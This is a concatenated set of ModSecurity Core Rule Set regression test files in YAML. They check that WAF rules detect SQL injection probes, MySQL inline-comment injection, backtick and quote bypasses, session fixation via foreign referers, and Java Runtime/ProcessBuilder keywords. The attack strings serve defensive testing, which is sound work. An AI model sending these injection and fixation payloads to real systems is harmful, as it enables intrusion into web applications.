localhost method: POST port: 80 uri: "/" data: "' ', 10" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-3 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "'', '', '', '', '', '', '', '', 13" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-4 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "`>65" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-5 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay='1001'='10" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-6 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "\"2562*23" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-7 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=\":[\"00" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-8 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=`>6fbdec2" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-9 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay='][0]]), strtolower($b[$GLOBALS['" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-10 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=', 2, 1" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-11 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "`>9e7" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-12 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=\":\"65" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-13 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay='\\2nq5" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-14 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=` < 0) AND `" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-15 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay='0:0:6" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-16 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "\":60" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-17 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=\">%5 - type_submit_reset_5" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-18 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "\":35" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-19 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay='3085'='30" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-20 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "\":\"[0,\\x22" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-21 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay='16/17" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-22 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "\";}7b6" version: HTTP/1.0 output: log_contains: id "942490" ���������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml��������0000664�0000000�0000000�00000001024�14461225151�0027707�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Franziska Buehler" description: None enabled: true name: 942500.yaml tests: - test_title: 942500-1 desc: "MySQL in-line comment detection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" version: HTTP/1.0 output: log_contains: id "942500" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml��������0000664�0000000�0000000�00000001630�14461225151�0027713�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Franziska Buehler" description: None enabled: true name: 942510.yaml tests: - test_title: 942510-1 desc: "SQLi bypass detected: backticks" stages: - stage: input: dest_addr: 127.0.0.1 headers: User-Agent: "ModSecurity CRS 3 Tests" Host: localhost method: GET port: 80 uri: "/?`bla`" version: HTTP/1.0 output: log_contains: id "942510" - test_title: 942510-2 desc: "SQLi bypass detected: backticks" stages: - stage: input: dest_addr: 127.0.0.1 headers: User-Agent: "ModSecurity CRS 3 Tests" Host: localhost method: GET port: 80 uri: "/?'bla'" version: HTTP/1.0 output: no_log_contains: id "942510" ��������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml��������0000664�0000000�0000000�00000001613�14461225151�0027715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Walter Hop" description: None enabled: true name: 942511.yaml tests: - test_title: 942511-1 desc: "SQLi bypass detected: quotes" stages: - stage: input: dest_addr: 127.0.0.1 headers: User-Agent: "ModSecurity CRS 3 Tests" Host: localhost method: GET port: 80 uri: "/?`bla`" version: HTTP/1.0 output: no_log_contains: id "942511" - test_title: 942511-2 desc: "SQLi bypass detected: quotes" stages: - stage: input: dest_addr: 127.0.0.1 headers: User-Agent: "ModSecurity CRS 3 Tests" Host: localhost method: GET port: 80 uri: "/?'bla'" version: HTTP/1.0 output: log_contains: id "942511" ���������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/�������0000775�0000000�0000000�00000000000�14461225151�0030056�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������943100.yaml�����������������������������������������������������������������������������������������0000664�0000000�0000000�00000001765�14461225151�0031434�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION���������������������������������������������������������������������������--- meta: author: csanders-git description: None enabled: true name: 943100.yaml tests: - test_title: 943100-1 desc: Session Fixation Attack (943100) from old modsec regressions stages: - stage: input: dest_addr: 127.0.0.1 headers: Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Encoding: gzip, deflate Accept-Language: zh-sg Host: localhost Keep-Alive: '300' Proxy-Connection: keep-alive Referer: http User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) method: GET port: 80 uri: /foo.php?bar=blah version: HTTP/1.1 output: log_contains: id "943100" �����������943110.yaml�����������������������������������������������������������������������������������������0000664�0000000�0000000�00000005343�14461225151�0031431�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION���������������������������������������������������������������������������--- meta: author: csanders-git description: None enabled: true name: 943110.yaml tests: - test_title: 943110-1 desc: Session Fixation Attack (943110) from old modsec regressions stages: - stage: input: dest_addr: 127.0.0.1 headers: Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Encoding: gzip, deflate Accept-Language: zh-sg Content-Type: application/x-www-form-urlencoded Host: localhost Keep-Alive: '300' Proxy-Connection: keep-alive Referer: http://www.attackersite.com/test User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) method: GET port: 80 uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 version: HTTP/1.1 output: log_contains: id "943110" - test_title: 943110-2 desc: "session fixation attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost Referer: "https://localhost.attackersite.com/" method: GET port: 80 uri: "/?phpsessid=asdfdasfadsads" version: HTTP/1.0 output: log_contains: id "943110" - test_title: 943110-3 desc: "session fixation attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost Referer: "https://attackersite.com/" method: GET port: 80 uri: "/?phpsessid=asdfdasfadsads" version: HTTP/1.0 output: log_contains: id "943110" - test_title: 943110-4 desc: Session Fixation Attack (943110) from old modsec regressions stages: - stage: input: dest_addr: 127.0.0.1 headers: Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel Accept-Encoding: gzip, deflate Accept-Language: zh-sg Content-Type: application/x-www-form-urlencoded Host: localhost Referer: http://localhost/test Keep-Alive: '300' Proxy-Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) method: GET port: 80 uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 version: HTTP/1.1 output: no_log_contains: id "943110" ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������943120.yaml�����������������������������������������������������������������������������������������0000664�0000000�0000000�00000001665�14461225151�0031435�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION���������������������������������������������������������������������������--- meta: author: csanders-git description: None enabled: true name: 943120.yaml tests: - test_title: 943120-1 desc: Session Fixation Attack (943120) from old modsec regressions stages: - stage: input: dest_addr: 127.0.0.1 headers: Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Encoding: gzip, deflate Accept-Language: zh-sg Host: localhost Keep-Alive: '300' Proxy-Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) method: GET port: 80 uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 version: HTTP/1.1 output: log_contains: id "943120" ���������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/�������������������0000775�0000000�0000000�00000000000�14461225151�0026236�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml��������0000664�0000000�0000000�00000001567�14461225151�0027673�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944000.yaml" description: "Description" tests: - test_title: 944000-1 desc: Using text/plain Content-Type which do not have any bodyprocessor associated stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "test=value" output: no_log_contains: "id \"944000\"" �����������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml��������0000664�0000000�0000000�00000035120�14461225151�0027664�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944100.yaml" description: "Description" tests: - test_title: 944100-1 desc: Argument test includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/x-www-form-urlencoded" method: POST version: HTTP/1.0 data: "test=java.lang.Runtime" output: log_contains: "id \"944100\"" - test_title: 944100-2 desc: Argument test includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "test=java.lang.ProcessBuilder" output: log_contains: "id \"944100\"" - test_title: 944100-3 desc: Argument name includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "java.lang.Runtime=test" output: log_contains: "id \"944100\"" - test_title: 944100-4 desc: Argument name includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "java.lang.ProcessBuilder=test" output: log_contains: "id \"944100\"" - test_title: 944100-5 desc: Cookie test includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: test=java.lang.Runtime method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944100\"" - test_title: 944100-6 desc: Cookie test includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: test=java.lang.ProcessBuilder method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944100\"" - test_title: 944100-7 desc: Cookie name includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: java.lang.Runtime=test method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944100\"" - test_title: 944100-8 desc: Cookie name includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: java.lang.ProcessBuilder=test method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944100\"" - test_title: 944100-9 desc: Request header test includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" test: java.lang.Runtime method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944100\"" - test_title: 944100-10 desc: Request header test includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" test: java.lang.ProcessBuilder method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944100\"" - test_title: 944100-11 desc: XML element includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "value" output: no_log_contains: "id \"944100\"" - test_title: 944100-12 desc: XML attribute name includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: no_log_contains: "id \"944100\"" - test_title: 944100-13 desc: XML attribute value includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: log_contains: "id \"944100\"" - test_title: 944100-14 desc: XML element value includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "java.lang.Runtime" output: log_contains: "id \"944100\"" - test_title: 944100-15 desc: XML element includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "value" output: no_log_contains: "id \"944100\"" - test_title: 944100-16 desc: XML attribute name includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: no_log_contains: "id \"944100\"" - test_title: 944100-17 desc: XML attribute value includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: log_contains: "id \"944100\"" - test_title: 944100-18 desc: XML element value includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "java.lang.ProcessBuilder" output: log_contains: "id \"944100\"" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml��������0000664�0000000�0000000�00000035054�14461225151�0027673�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944110.yaml" description: "Description" tests: - test_title: 944110-1 desc: Argument test includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/x-www-form-urlencoded" method: POST version: HTTP/1.0 data: "test=java.Runtime" output: log_contains: "id \"944110\"" - test_title: 944110-2 desc: Argument test includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "test=java.ProcessBuilder" output: log_contains: "id \"944110\"" - test_title: 944110-3 desc: Argument name includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "java.Runtime=test" output: log_contains: "id \"944110\"" - test_title: 944110-4 desc: Argument name includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "java.ProcessBuilder=test" output: log_contains: "id \"944110\"" - test_title: 944110-5 desc: Cookie test includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: test=java.Runtime method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944110\"" - test_title: 944110-6 desc: Cookie test includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: test=java.ProcessBuilder method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944110\"" - test_title: 944110-7 desc: Cookie name includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: java.Runtime=test method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944110\"" - test_title: 944110-8 desc: Cookie name includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: java.ProcessBuilder=test method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944110\"" - test_title: 944110-9 desc: Request header test includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" test: java.Runtime method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944110\"" - test_title: 944110-10 desc: Request header test includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 